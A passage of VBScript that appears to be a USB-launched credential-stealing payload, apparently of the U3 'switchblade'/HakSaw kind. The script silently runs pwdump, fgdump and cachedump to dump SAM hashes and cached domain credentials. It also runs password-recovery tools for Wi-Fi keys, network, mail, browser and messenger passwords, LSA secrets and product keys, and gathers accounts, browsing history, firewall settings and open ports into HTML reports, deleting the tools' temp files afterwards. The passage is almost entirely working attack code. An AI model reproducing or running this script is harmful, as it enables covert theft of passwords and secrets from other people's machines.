class=""colhead""><b>SID Type</b></td>" & _ "<td class=""colhead""><b>Status</b></td></tr>" Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputerName & "\root\cimv2") Set colItems = objWMIService.ExecQuery _ ("Select * from Win32_UserAccount Where LocalAccount = True") For Each objItem in colItems objRightFile.WriteLine "<tr><td>" & objItem.AccountType & "</td>" objRightFile.WriteLine "<td>" & objItem.Caption & "</td>" objRightFile.WriteLine "<td>" & objItem.Description & "</td>" objRightFile.WriteLine "<td>" & objItem.Disabled & "</td>" objRightFile.WriteLine "<td>" & objItem.Domain & "</td>" objRightFile.WriteLine "<td>" & objItem.FullName & "</td>" objRightFile.WriteLine "<td>" & objItem.LocalAccount & "</td>" objRightFile.WriteLine "<td>" & objItem.Lockout & "</td>" objRightFile.WriteLine "<td>" & objItem.Name & "</td>" objRightFile.WriteLine "<td>" & objItem.PasswordChangeable & "</td>" objRightFile.WriteLine "<td>" & objItem.PasswordExpires & "</td>" objRightFile.WriteLine "<td>" & objItem.PasswordRequired & "</td>" objRightFile.WriteLine "<td>" & objItem.SID & "</td>" objRightFile.WriteLine "<td>" & objItem.SIDType & "</td>" objRightFile.WriteLine "<td>" & objItem.Status & "</td></tr>" Next else 'Create a table objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Name</b></td>" & _ "<td class=""colhead""><b>Full Name</b></td>" & _ "<td class=""colhead""><b>Description</b></td>" & _ "<td class=""colhead""><b>Lockout</b></td>" & _ "<td class=""colhead""><b>Disabled</b></td>" & _ "<td class=""colhead""><b>Admin?</b></td></tr>" Set objComputer = GetObject("WinNT://.") objComputer.Filter = Array( "User" ) 'Set objGroup = GetObject("WinNT://./Administrators,group") For Each objItem In objComputer objRightFile.WriteLine "<tr><td>" & objItem.Name & "</td>" objRightFile.WriteLine "<td>" & objItem.FullName & "</td>" objRightFile.WriteLine "<td>" & objItem.Description & "</td>" objRightFile.WriteLine "<td>" & objItem.IsAccountLocked & "</td>" objRightFile.WriteLine "<td>" & objItem.AccountDisabled & "</td>" strIsAdmin = "?" objRightFile.WriteLine "<td>" & strIsAdmin & "</td></tr>" Next End If 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" End If ' +----------------------------------+ ' + [External IP] + ' +----------------------------------+ If ReadINI("External IP","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_6"" target=""right"">External IP</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_6""></a><font size=""3""><b>External IP</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>IP</b></td></tr>" URL= ReadINI("External IP","url",strIniFile) If ReadINI("External IP","Method",strIniFile) = 1 Then Set http = CreateObject("Microsoft.XmlHttp") http.open "GET", URL, FALSE http.send "" strResponse = RemoveHTML(http.responseText) Set http = Nothing Else objShell.Exec("wget.exe " & URL & "--output-document=" & strtmpFile) If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strResponse = RemoveHTML(objTextFile.ReadLine) objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if End If objRightFile.WriteLine "<tr><td>" & Right(strResponse, Len(strResponse) - InStr(strResponse,":")) & "</td></tr>" 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" End If ' +----------------------------------+ ' + [VNC] + ' +----------------------------------+ If ReadINI("VNC","Enable",strIniFile) Then 'Not Implemented End If ' +----------------------------------+ ' + [HakSaw] + ' +----------------------------------+ If ReadINI("Haksaw","Enable",strIniFile) Then 'Not Implemented End if ' +----------------------------------+ ' + [Dump Wifi Hex] + ' +----------------------------------+ If ReadINI("WIFI Key","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_7"" target=""right"">Wireless Hex</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_7""></a><font size=""3""><b>Wireless Key</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "wifike.exe /shtml " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"</body>",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if End if ' +----------------------------------+ ' + [Dump SAM PWDUMP] + ' +----------------------------------+ If ReadINI("SAM PWDUMP","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_8"" target=""right"">SAM PWDUMP</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_8""></a><font size=""3""><b>PWDump</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" If isAdmin then objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Username</b></td>" & _ "<td class=""colhead""><b>UID</b></td>" & _ "<td class=""colhead""><b>Encrypted password</b></td>" & _ "<td class=""colhead""><b>LAN Man Password Hash</b></td>" & _ "<td class=""colhead""><b>Windows NT Password Hash</b></td>" & _ "<td class=""colhead""><b>Full Name and Description</b></td>" & _ "<td class=""colhead""><b>Home directory</b></td></tr>" objShell.Run "pwdump -o " & strtmpFile & " " & strComputerName , 0, False Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\.\root\cimv2") '// 5 Second Watchdog Timer // '// // Secs = Now() Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'pwdump.exe'") Do Until (DateDiff("s", Secs, Now()) > 5) or colProcessList.Count = 0 Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'pwdump.exe'") Loop If colProcessList.Count <> 0 Then 'kill process it shouldn't run this long For Each objProcess in colProcessList objProcess.Terminate() Next End If '\\ \\ '\\ End Watchdog Timer \\ ' If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) Do Until objTextFile.AtEndOfStream strarry = Split(objTextFile.ReadLine,":") strline = "" For i =0 To UBound(strarry) strline = strline & "<td>" & strarry(i) & "</td>" Next objRightFile.WriteLine "<tr>" & strLine & "</tr>" Loop 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If Else objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Result</b></td></tr>" objRightFile.WriteLine "<td>Not Admin</td>" objRightFile.WriteLine "</tbody></table></p><p> </p>" End If End if ' +----------------------------------+ ' + [Dump SAM FGDUMP] + ' +----------------------------------+ If ReadINI("SAM FGDUMP","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_9"" target=""right"">SAM FGDUMP</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_9""></a><font size=""3""><b>FGDump</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" If isAdmin then objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Username</b></td>" & _ "<td class=""colhead""><b>UID</b></td>" & _ "<td class=""colhead""><b>Encrypted password</b></td>" & _ "<td class=""colhead""><b>LAN Man Password Hash</b></td>" & _ "<td class=""colhead""><b>Windows NT Password Hash</b></td>" & _ "<td class=""colhead""><b>Full Name and Description</b></td>" & _ "<td class=""colhead""><b>Home directory</b></td></tr>" 'Change Directory objShell.CurrentDirectory =strLogPath objShell.Run U3 & "\fgdump.exe -c -k " , 0, False Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\.\root\cimv2") '// 5 Second Watchdog Timer // '// // Secs = Now() Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'fgdump.exe'") Do Until (DateDiff("s", Secs, Now()) > 5) or colProcessList.Count = 0 Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'fgdump.exe'") Loop If colProcessList.Count <> 0 Then 'kill process it shouldn't run this long For Each objProcess in colProcessList objProcess.Terminate() Next End If '\\ \\ '\\ End Watchdog Timer \\ ' If objFSO.FileExists("127.0.0.1.pwdump") Then Set objTextFile = objFSO.OpenTextFile("127.0.0.1.pwdump", FOR_READING) Do Until objTextFile.AtEndOfStream strarry = Split(objTextFile.ReadLine,":") strline = "" For i =0 To UBound(strarry) strline = strline & "<td>" & strarry(i) & "</td>" Next objRightFile.WriteLine "<tr>" & strLine & "</tr>" Loop 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" objShell.CurrentDirectory = U3 objTextFile.Close Set objTextFile = Nothing End If WScript.Sleep CInt(Sleepms) Else objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Result</b></td></tr>" objRightFile.WriteLine "<td>Not Admin</td>" objRightFile.WriteLine "</tbody></table></p><p> </p>" End If End If ' +----------------------------------+ ' + [Dump Network PW] + ' +----------------------------------+ If ReadINI("Network Password","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_10"" target=""right"">Network Password</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_10""></a><font size=""3""><b>Network Password</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "netpass.exe /shtml " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"</body>",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End If ' +----------------------------------+ ' + [Dump Mail PW] + ' +----------------------------------+ If ReadINI("Mail Password","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_11"" target=""right"">Mail Password</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_11""></a><font size=""3""><b>Mail Password</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "mailpv.exe /shtml " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"</body>",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End if ' +----------------------------------+ ' + [Dump Firefox PW] + ' +----------------------------------+ If ReadINI("Firefox Password","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_12"" target=""right"">Firefox Password(s)</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_12""></a><font size=""3""><b>Firefox Password</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Text Dump</b></td></tr>" objShell.run "nircmd execmd FirePassword.exe >" & strFireFile,0 , True 'Nircmd is asynchronously we need to wait to ensure file written to WScript.Sleep CInt(Sleepms) If objFSO.FileExists(strFireFile) Then Set objTextFile = objFSO.OpenTextFile(strFireFile, FOR_READING) Do Until objTextFile.AtEndOfStream objRightFile.WriteLine "<tr><td>" & objTextFile.ReadLine & "</td></tr>" Loop 'End Table objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strFireFile,True If Err <> 0 Then Err.Clear End If End if objRightFile.WriteLine "</tbody></table></p><p> </p>" End if ' +----------------------------------+ ' + [Dump IE PW] + ' +----------------------------------+ If ReadINI("IE Password","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_13"" target=""right"">IE Password(s)</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_13""></a><font size=""3""><b>IE Password</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "iepv.exe /shtml " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"</body>",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End if ' +----------------------------------+ ' + [Dump messenger PW] + ' +----------------------------------+ If ReadINI("Messenger Password","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_14"" target=""right"">Messenger Password(s)</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_14""></a><font size=""3""><b>Messenger Password</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "mspass.exe /shtml " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"</body>",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End if ' +----------------------------------+ ' + [Dump Cache] + ' +----------------------------------+ If ReadINI("Cache","Enable",strIniFile) Then Set objWMIService = GetObject("winmgmts:\\.\root\CIMV2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem") isDomain = False For Each objItem In colItems isDomain = objItem.PartOfDomain 'post-Windows 2000 only Next objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_15"" target=""right"">Cache</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_15""></a><font size=""3""><b>Cache Dump</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" If isDomain Then objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Results</b></td></tr>" 'Change Directory objShell.CurrentDirectory =strLogPath Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\.\root\cimv2") If ReadINI("Cache","Method",strIniFile)=1 Then objShell.Run U3 & "\fgdump.exe -w -k " , 0, True '// 5 Second Watchdog Timer // '// // Secs = Now() Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'fgdump.exe'") Do Until (DateDiff("s", Secs, Now()) > 5) or colProcessList.Count = 0 Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'fgdump.exe'") Loop Else objShell.Run U3 & "\cachedump.exe " , 0, True Secs = Now() Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'cachedump.exe'") Do Until (DateDiff("s", Secs, Now()) > 5) or colProcessList.Count = 0 Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'cachedump.exe'") Loop End If If colProcessList.Count <> 0 Then 'kill process it shouldn't run this long For Each objProcess in colProcessList objProcess.Terminate() Next End If '\\ \\ '\\ End Watchdog Timer \\ ' If objFSO.FileExists("127.0.0.1.cachedump") Then Set objTextFile = objFSO.OpenTextFile("127.0.0.1.cachedump", FOR_READING) Do Until objTextFile.AtEndOfStream objRightFile.WriteLine "<tr><td>" & objTextFile.ReadLine & "</td></tr>" Loop objTextFile.Close Set objTextFile = Nothing End If 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" objShell.CurrentDirectory = U3 Else objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Result</b></td></tr>" objRightFile.WriteLine "<td>Not in a Domain</td>" objRightFile.WriteLine "</tbody></table></p><p> </p>" End If Set objWMIService = Nothing Set colItems = Nothing End if ' +----------------------------------+ ' + [Dump LSA secrets] + ' +----------------------------------+ If ReadINI("LSA Secrets","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_16"" target=""right"">LSA Secrets</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_16""></a><font size=""3""><b>LSA Secrets</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "pspv.exe /shtml " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"</body>",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End if ' +----------------------------------+ ' + [Dump Product Keys] + ' +----------------------------------+ If ReadINI("Product Keys","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_17"" target=""right"">Product Keys</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_17""></a><font size=""3""><b>Product Keys</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "produkey.exe /nosavereg /shtml " & strtmpFile & " /remote " & strComputerName, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"</body>",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if End if ' +----------------------------------+ ' + [Dump URL History] + ' +----------------------------------+ If ReadINI("IE URL History","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_18"" target=""right"">IE URL History</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_18""></a><font size=""3""><b>URL History</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" set sh = createobject("Shell.Application") Set history = sh.NameSpace(ssfHISTORY) for each item in history.items objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Item</b></td>" & _ "<td class=""colhead""><b>Details</b></td></tr>" objRightFile.WriteLine "<tr><td>" & history.GetDetailsOf(item,-1) & "</td></tr>" If item.isFolder then set itFol = item.GetFolder for each item2 in itFol.items arry = split(itFol.GetDetailsOf(item2,-1),vbcrlf) objRightFile.WriteLine "<tr><td>" & arry(0) & "</td>" For i = 1 To UBound(arry) objRightFile.WriteLine "<td><a href=http://" & arry(i) & "> " & arry(i) & "</a></td>" Next objRightFile.WriteLine "</tr>" Next end if 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" Next Set history = Nothing Set sh = Nothing End if ' +----------------------------------+ ' + [Dump Updates-List] + ' +----------------------------------+ If ReadINI("Windows Updates List","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_19"" target=""right"">Updates List</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_19""></a><font size=""3""><b>Windows Updates</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "wul.exe /shtml " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"</body>",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if End if ' +----------------------------------+ ' + [Firewall] + ' +----------------------------------+ If ReadINI("Firewall Status","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_20"" target=""right"">Firewall Status</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_20""></a><font size=""3""><b>Firewall Status</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" Set objFirewall = CreateObject("HNetCfg.FwMgr") Set objPolicy = objFirewall.LocalPolicy.CurrentProfile objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Profile Type</b></td>" & _ "<td class=""colhead""><b>Firewall Enabled</b></td>" & _ "<td class=""colhead""><b>Exceptions Not Allowed</b></td>" & _ "<td class=""colhead""><b>Notifications Disabled</b></td>" & _ "<td class=""colhead""><b>Unicast responses to multicast broadcast disabled</b></td></tr>" objRightFile.WriteLine "<tr><td>" & objFirewall.CurrentProfileType & "</td>" If objPolicy.FirewallEnabled Then objRightFile.WriteLine "<td bgcolor=""#00ff00"">True</td>" Else objRightFile.WriteLine "<td bgcolor=""#ff0000"">False</td>" End If objRightFile.WriteLine "<td>" & objPolicy.ExceptionsNotAllowed & "</td>" objRightFile.WriteLine "<td>" & objPolicy.NotificationsDisabled & "</td>" objRightFile.WriteLine "<td>" & objPolicy.UnicastResponsestoMulticastBroadcastDisabled & "</td></tr>" 'End Table objRightFile.WriteLine "</tbody></table></p>" Set colPorts = objPolicy.GloballyOpenPorts objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Port Name</b></td>" & _ "<td class=""colhead""><b>Port Number</b></td>" & _ "<td class=""colhead""><b>IP Version</b></td>" & _ "<td class=""colhead""><b>Protocol</b></td>" & _ "<td class=""colhead""><b>Scope</b></td>" & _ "<td class=""colhead""><b>Remote Addresses</b></td>" & _ "<td class=""colhead""><b>Enabled</b></td>" & _ "<td class=""colhead""><b>Built-in</b></td></tr>" For Each objPort in colPorts objRightFile.WriteLine "<tr><td>" & objPort.Name & "</td>" objRightFile.WriteLine "<td>" & objPort.Port & "</td>" objRightFile.WriteLine "<td>" & objPort.IPVersion & "</td>" objRightFile.WriteLine "<td>" & objPort.Protocol & "</td>" objRightFile.WriteLine "<td>" & objPort.Scope & "</td>" objRightFile.WriteLine "<td>" & objPort.RemoteAddresses & "</td>" objRightFile.WriteLine "<td>" & objPort.Enabled & "</td>" objRightFile.WriteLine "<td>" & objPort.Builtin & "</td></tr>" Next 'End Table objRightFile.WriteLine "</tbody></table></p>" Set colApplications = objPolicy.AuthorizedApplications objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Authorized Application</b></td>" & _ "<td class=""colhead""><b>Enabled</b></td>" & _ "<td class=""colhead""><b>IP Version</b></td>" & _ "<td class=""colhead""><b>Process Image File Name</b></td>" & _ "<td class=""colhead""><b>Remote Addresses</b></td>" & _ "<td class=""colhead""><b>Scope</b></td></tr>" For Each objApplication in colApplications objRightFile.WriteLine "<tr><td>" & objApplication.Name & "</td>" objRightFile.WriteLine "<td>" & objApplication.Enabled & "</td>" objRightFile.WriteLine "<td>" & objApplication.IPVersion & "</td>" objRightFile.WriteLine "<td>" & objApplication.ProcessImageFileName & "</td>" objRightFile.WriteLine "<td>" & objApplication.RemoteAddresses & "</td>" objRightFile.WriteLine "<td>" & objApplication.Scope & "</td></tr>" Next 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" Set objFireWall = Nothing Set ObjPolicy = Nothing Set colPorts = Nothing Set colApplications = Nothing End if ' +----------------------------------+ ' + [Port Scan] + ' +----------------------------------+ If ReadINI("Open Port Scan","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_21"" target=""right"">Open Port Scan</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_21""></a><font size=""3""><b>Local Port Scan</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objShell.Run "portqry -local -l " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Results</b></td></tr>" Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline Select Case True Case Left(strLine,3) = "PID" 'End Previous Table objRightFile.WriteLine "</tbody></table>" 'Start New Table objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>PID</b></td>" & _ "<td class=""colhead""><b>Port</b></td>" & _ "<td class=""colhead""><b>Local IP</b></td>" & _ "<td class=""colhead""><b>State</b></td>" & _ "<td class=""colhead""><b>Remote IP: Port</b></td></tr>" Case IsNumeric(Left(strline,1)) And InStr(1,strLine, "mappings found")=0 strarry = Split(Replace(strLine,vbTab&vbTab&vbTab,vbTab&vbTab),vbTab) sText = "" For i =0 To UBound(strarry) sText = sText & "<td>" & strarry(i) & "</td>" Next objRightFile.WriteLine "<tr>" & sText & "</tr>" bPorts = True Case Else If bPorts = True Then objRightFile.WriteLine "</tbody></table>" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Results</b></td></tr>" bPorts = 